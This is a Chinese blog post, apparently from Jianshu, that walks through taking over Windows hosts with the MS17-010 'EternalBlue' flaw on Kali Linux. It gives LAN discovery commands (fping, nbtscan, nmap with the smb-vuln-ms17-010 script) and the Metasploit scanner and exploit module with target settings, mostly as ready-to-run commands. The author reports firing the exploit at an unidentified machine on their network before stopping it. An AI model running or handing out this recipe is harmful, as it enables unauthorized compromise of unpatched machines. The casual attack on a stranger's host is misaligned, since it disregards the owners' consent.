kali利用永恒之藍(lán)獲取主機(jī)權(quán)限

  1. 編輯kali的源為國內(nèi)源
    1.#阿里云Kali源
    2.deb http://mirrors.aliyun.com/kali kali main non-free contrib 
    3.deb-src http://mirrors.aliyun.com/kali kali main non-free contrib 
    4.deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
  1. 更新應(yīng)用
apt-get update && apt-get upgrade && apt-get dist-upgrade
  1. 更新系統(tǒng)內(nèi)核
apt-get install linux-headers-$(uname -r)
  1. 如果報錯可以試試這個
aptitude -r install linux-headers-$(uname -r
  1. 主機(jī)存活檢測
# fping 工具 kali自帶
fping -asg 192.168.1.0/24
1.jpg
# nbtscan工具 kali自帶
nbtscan -r 192.168.1.0/24
2.jpg
# nmap ping 包掃描
nmap -n -sS 192.168.1.0/24
# 指定端口發(fā)現(xiàn)掃描
nmap -n -p445 192.168.1.0/24 --open
# 針對漏洞腳本的定向掃描
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
# 個人推薦使用 nmap -n -p445 192.168.1.0/24 --open 其掃描發(fā)現(xiàn)的效率最高。
3.jpg
  1. MSF Auxiliary 輔助掃描
msfconsole # 進(jìn)入MSF框架 
version # 確認(rèn)下MSF的版本 
search ms17_010 # 查找漏洞模塊的具體路徑 
use auxiliary/scanner/smb/smb_ms17_010 # 調(diào)用漏洞掃描模塊 
show options # 查看模塊配置選項 
set RHOST 192.168.1.1-254 # 配置掃描目標(biāo) 
set THREADS 30 #配置掃描線程 
run #運行腳本
  1. 這個使用下來,我們發(fā)現(xiàn)其實還沒有namp 一條命令就搞定了,來的方便。
  2. 上邊的都是為了掃描開放端口的主機(jī),接下來利用漏洞獲取權(quán)限
ms17-010 漏洞利用之MSF使用方法
msfconsole # 進(jìn)入MSF 框架 
version # 確保MSF框架版本在 4.14.17以上; 
search ms17_010 # 漏洞模塊路徑查詢 
use exploit/windows/smb/ms17_010_eternalblue # 調(diào)用攻擊模塊
set RHOST 192.168.1.112 # 設(shè)定攻擊目標(biāo) 
exploit # 發(fā)起攻擊
  1. 查找漏洞模塊路徑


    4.jpg
  2. 調(diào)用和配置exploit攻擊參數(shù)


    5.jpg
  3. 設(shè)置工具目標(biāo)


    6.jpg
  4. 發(fā)起攻擊 exploit 或者 run


    7.jpg
  5. 我手動終止了,不知道這是什么機(jī)器,不亂搞了,如果成功會直接返回會話(看各位的運氣了!)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Metasploit-ms17-010 永恒之藍(lán) 永恒之藍(lán)是去年玩剩下的了,記得當(dāng)初剛剛泄露的時候,用的是 NSA...
    Jarodlu閱讀 4,614評論 0 0
  • 一 漏洞及漏洞發(fā)掘方法 漏洞,是指在硬件、軟件、協(xié)議實現(xiàn)或系統(tǒng)安全策略上存在缺陷,攻擊者能夠在未授權(quán)的情況下對系統(tǒng)...
    kaitoulee閱讀 15,661評論 0 30
  • Metasploit基本介紹與配置 Metasploit作為一個非常全面的滲透工具,用來收集信息非常好用,信息收集...
    yingtaomj閱讀 2,986評論 0 2
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡介 這章...
    三月行者閱讀 1,973評論 2 7
  • 對我這樣一個偶爾才激起思考熱情的人來說,讀卡夫卡始終是一種受罪。對一團(tuán)隨時彌漫的巨大的思想的迷霧,你就是一直盯...
    尤其拉閱讀 281評論 2 5

友情鏈接更多精彩內(nèi)容